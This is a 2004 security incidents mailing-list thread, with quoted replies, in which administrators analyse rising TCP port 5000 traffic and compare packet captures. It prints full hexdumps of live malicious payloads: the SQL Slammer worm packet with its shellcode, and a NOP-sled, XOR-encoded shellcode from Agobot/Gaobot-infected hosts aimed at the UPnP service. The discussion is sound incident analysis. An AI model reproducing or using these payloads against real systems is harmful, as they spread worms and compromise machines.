Security Incidents mailing list archives
RE: [Securityfocus-incidents] RE: TCP port 5000 syn increasing
From: "Remko Lodder" <remko () elvandar org>
Date: Tue, 18 May 2004 17:43:11 +0200
Take a look at the link posted by Frank Knobbe on Full-Disclosure; http://isc.sans.org/index.php?on=diary There is the info that you need ;-) Cheers! -- Kind regards, Remko Lodder Elvandar.org/DSINet.org www.mostly-harmless.nl Dutch community for helping newcomers on the hackerscene mrtg.grunn.org Dutch mirror of MRTG -----Oorspronkelijk bericht----- Van: securityfocus-incidents-bounces () lists elvandar org [mailto:securityfocus-incidents-bounces () lists elvandar org]Namens Steven Trewick Verzonden: dinsdag 18 mei 2004 17:06 Aan: 'Mike Barushok'; incidents () securityfocus com Onderwerp: [Securityfocus-incidents] RE: TCP port 5000 syn increasing SQL Slammer lives on udp port 1434, and it looks like this 03/22-21:36:31.155369 211.99.223.42:1045 -> 192.168.0.88:1434 UDP TTL:105 TOS:0x0 ID:35759 IpLen:20 DgmLen:404 Len: 376 04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................ 01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE ....B.........p. 42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9 B.p.B........h.. B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01 .B.....1...P..5. 01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33 ...P..Qh.dllhel3 32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 2hkernQhounthick 43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64 ChGetTf.llQh32.d 68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66 hws2_f.etQhsockf B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45 .toQhsend....B.E D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50 .P..P.E.P.E.P..P BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05 ....B....=U..Qt. BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1 ....B....1.QQP.. 03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B ..........Q.E.P. 45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45 E.P..j.j.j...P.E C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61 .P.E.P........<a D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2 ...E...@........ C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D ...).......E.j.. 45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50 E.P1.Qf..x.Q.E.P 8B 45 AC 50 FF D6 EB CA .E.P.... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Which is different from the capture in question, (and also different from the capture on the site). I can only assume that the site referred to has made some kind of mistake in the title. Since this traffic is TCP and directed towards port 5000, it is indeed most likely *either* some kind of exploit for a Universal Plug And Play (UPnP) service. (Since UPnP conducts all of its legitimate business using cleartext HTML, it certainly isn't legit traffic.) *or* its something else using port 5000. (Possible since everyone in the world has realised what an awful crock UPnP is, and how insecure it is, and switched it off, haven't they ? <g> ) I'd go with the assessment of a UPnP vuln, but that's because I have spent time hammering on UPnP services, and they suck an awful lot, but even so, that doesn't look long enough to overflow a buffer, since a typical UPnP packet is fairly long (maybe an overflow in header info fields, HTTP version number, etc?) Bear in mind however, that many many SoHo WLAN and DSL modems/routers/etc *also* use UPnP, often times for remote administration, (google this a bit and see the exploits roll in) so this may not represent an attack against a host, but a network device. (Although the NB scans tend to suggest otherwise)
-----Original Message----- From: Mike Barushok [mailto:barushok () keycreations com] Sent: 17 May 2004 23:15 To: incidents () securityfocus com Subject: Re: TCP port 5000 syn increasing Exactly identical to the capture posted at: http://www.linklogger.com/TCP5000_Overflow.htm (That page has title: 'SQL Slammer Capture'). On Mon, 17 May 2004, Noel Cuillandre wrote:It's a buffer overflow attack on the plug and play serviceon TCP port5000. The hexdump corresponds to a SQLSlammer's like worm. Noel Cuillandre Paul Schmehl a écrit :----- Original Message ----- From: "ANDREW STREULE" <brother_wolf () btopenworld com> To: <incidents () securityfocus com> Sent: Monday, May 17, 2004 2:24 PM Subject: Re: TCP port 5000 syn increasingon my honeypot a port 5000 event is almost always followed by 1 or 2 nbt smb events.Here's a hexdump of what I'm seeing on 5000. The ones I'mseeing are comingfrom boxes infected with Agobot/Gaobot and not just 81.x.x.x. 00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................00000010 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................00000020 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................00000030 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................00000040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................00000050 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................00000060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................00000070 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................00000080 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................00000090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................000000A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................000000B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................000000C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................000000D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................000000E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................000000F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................00000100 90 90 90 90 90 90 90 90 90 90 90 90 4D 3F E3 77............M?.w00000110 90 90 90 90 FF 63 64 90 90 90 90 90 90 90 90 90.....cd.........00000120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90................00000130 90 90 90 90 90 90 90 90 EB 10 5A 4A 33 C9 66 B9..........ZJ3.f.00000140 66 01 80 34 0A 99 E2 FA EB 05 E8 EB FF FF FF 70f..4...........p00000150 99 98 99 99 C3 21 95 69 64 E6 12 99 12 E9 85 34.....!.id......400000160 12 D9 91 12 41 12 EA A5 9A 6A 12 EF E1 9A 6A 12....A....j....j.00000170 E7 B9 9A 62 12 D7 8D AA 74 CF CE C8 12 A6 9A 62...b....t......b00000180 12 6B F3 97 C0 6A 3F ED 91 C0 C6 1A 5E 9D DC 7B.k...j?.....^..{00000190 70 C0 C6 C7 12 54 12 DF BD 9A 5A 48 78 9A 58 AAp....T....ZHx.X.000001A0 50 FF 12 91 12 DF 85 9A 5A 58 78 9B 9A 58 12 99P.......ZXx..X..000001B0 9A 5A 12 63 12 6E 1A 5F 97 12 49 F3 9A C0 71 E5.Z.c.n._..I...q.000001C0 99 99 99 1A 5F 94 CB CF 66 CE 65 C3 12 41 F3 9D...._...f.e..A..000001D0 C0 71 F0 99 99 99 C9 C9 C9 C9 F3 98 F3 9B 66 CE.q............f.000001E0 69 12 41 5E 9E 9B 99 9E 24 AA 59 10 DE 9D F3 89i.A^....$.Y.....000001F0 CE CA 66 CE 6D F3 98 CA 66 CE 61 C9 C9 CA 66 CE..f.m...f.a...f.00000200 65 1A 75 DD 12 6D AA 42 F3 89 C0 10 85 17 7B 62e.u..m.B......{b00000210 10 DF A1 10 DF A5 10 DF D9 5E DF B5 98 98 99 99.........^......00000220 14 DE 89 C9 CF CA CA CA F3 98 CA CA 5E DE A5 FA............^...00000230 F4 FD 99 14 DE A5 C9 CA 66 CE 7D C9 66 CE 71 AA........f.}.f.q.00000240 59 35 1C 59 EC 60 C8 CB CF CA 66 4B C3 C0 32 7BY5.Y.`....fK..2{00000250 77 AA 59 5A 71 62 67 66 66 DE FC ED C9 EB F6 FAw.YZqbgff.......00000260 D8 FD FD EB FC EA EA 99 DA EB FC F8 ED FC C9 EB................00000270 F6 FA FC EA EA D8 99 DC E1 F0 ED C9 EB F6 FA FC................00000280 EA EA 99 D5 F6 F8 FD D5 F0 FB EB F8 EB E0 D8 99................00000290 EE EA AB C6 AA AB 99 CE CA D8 CA F6 FA F2 FC ED................000002A0 D8 99 FB F0 F7 FD 99 F5 F0 EA ED FC F7 99 F8 FA................000002B0 FA FC E9 ED 99 0D 0A 0D 0A.........Paul Schmehl (pauls () utdallas edu) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/~pauls/--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------------------- ---------------- Mike Barushok Senior Security Administrator KeyCreations.com/KCISP.net/ispKansas.com -------------------------------------------------------------- ------------- -------------------------------------------------------------- -------------- --- Incoming mail checked for known viruses Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.683 / Virus Database: 445 - Release Date: 12/05/04
</code> The information contained in this e-mail is confidential and may be privileged, it is intended for the addressee only. If you have received this e-mail in error please delete it from your system. The statements and opinions expressed in this message are those of the author and do not necessarily reflect those of the company. Whilst Joplings Group operates an e-mail anti-virus program it does not accept responsibility for any damage whatsoever that is caused by viruses being passed. joplings.co.uk --------------------------------------------------------------------------- ---------------------------------------------------------------------------- _______________________________________________ Securityfocus-incidents mailing list Securityfocus-incidents () lists elvandar org http://lists.elvandar.org/mailman/listinfo/securityfocus-incidents --------------------------------------------------------------------------- ----------------------------------------------------------------------------
Current thread:
- RE: TCP port 5000 syn increasing, (continued)
- RE: TCP port 5000 syn increasing Frank Knobbe (May 18)
- Re: TCP port 5000 syn increasing Valdis . Kletnieks (May 18)
- Re: TCP port 5000 syn increasing Andreas (May 19)
- Re: TCP port 5000 syn increasing Harlan Carvey (May 19)
- Re: TCP port 5000 syn increasing Valdis . Kletnieks (May 19)
- Re: TCP port 5000 syn increasing Harlan Carvey (May 19)
- RE: TCP port 5000 syn increasing Nick FitzGerald (May 19)
- RE: TCP port 5000 syn increasing Nick FitzGerald (May 19)
- RE: TCP port 5000 syn increasing Paul Schmehl (May 19)
- RE: [Securityfocus-incidents] RE: TCP port 5000 syn increasing Remko Lodder (May 18)
- Re: TCP port 5000 syn increasing Bob (May 20)
- Re: TCP port 5000 syn increasing Valdis . Kletnieks (May 21)